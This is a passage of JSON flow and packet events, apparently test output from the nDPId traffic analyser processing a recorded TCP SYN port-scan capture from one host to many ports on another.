-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsDY0AADEGCeasEAAIQA2GNIzSDSzdUoMYAAAAAGACCAAjYwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAss7AAADcGXcKsEAAIQA2GNIzSAq\/dUoMYAAAAAGACEAAl4AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN0AACkGGpasEAAIQA2GNIzSHvDdUoMYAAAAAGACCAARnwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPEAADIG0YGsEAAIQA2GNIzSwAjdUoMYAAAAAGACDABshgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsQU0AACwG2yWsEAAIQA2GNIzSC8XdUoMYAAAAAGACBAAoygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAspwkAACcGemmsEAAIQA2GNIzSFGndUoMYAAAAAGACEAAUJgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsWZIAADsGs+CsEAAIQA2GNIzSCMvdUoMYAAAAAGACEAAfxAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fkAACkGIXmsEAAIQA2GNIzTFyXdU4MZAAAAAGACCAAZZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsosMAADgGba+sEAAIQA2GNIzTBNLdU4MZAAAAAGACBAAvugAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsxwIAADEGUHCsEAAIQA2GNIzTFxvdU4MZAAAAAGACCAAZcQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsG2YAACoGAw2sEAAIQA2GNIzTG1\/dU4MZAAAAAGACDAARLQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsBP4AADoGCXWsEAAIQA2GNIzTatndU4MZAAAAAGACDADBsgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsCS8AACsGFESsEAAIQA2GNIzTBIDdU4MZAAAAAGACEAAkDAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE0AADQG4CWsEAAIQA2GNIzTxczdU4MZAAAAAGACBABuvwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGwAADgGhAasEAAIQA2GNIzTE4vdU4MZAAAAAGACBAAhAQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsvsAAADAGWbKsEAAIQA2GNIzTBCfdU4MZAAAAAGACBAAwZQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsu84AACgGZKSsEAAIQA2GNIzTW87dU4MZAAAAAGACBADYvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAseXYAACgGpvysEAAIQA2GNIzTCT7dU4MZAAAAAGACBAArTgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBQAACUGm16sEAAIQA2GNIzTw1bdU4MZAAAAAGACCABtNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjIAADIG7ECsEAAIQA2GNIzTIc7dU4MZAAAAAGACDAAKvgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsmVUAADkGdh2sEAAIQA2GNIzTCHDdU4MZAAAAAGACCAAoHAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs4M4AADcGMKSsEAAIQA2GNIzT1xDdU4MZAAAAAGACEABRewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsXlYAADsGrxysEAAIQA2GNIzTFbPdU4MZAAAAAGACEAAS2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1868,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTcAACYGtTusEAAIQA2GNIzTH1bdU4MZAAAAAGACDAANNgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061211,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_packet_id":1,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061211,"pkt":"ACYLMQczACWzv5HuCABFAAAs5EEAADsGKTGsEAAIQA2GNIzTII3dU4MZAAAAAGACEAAH\/wAAAgQFtA=="} 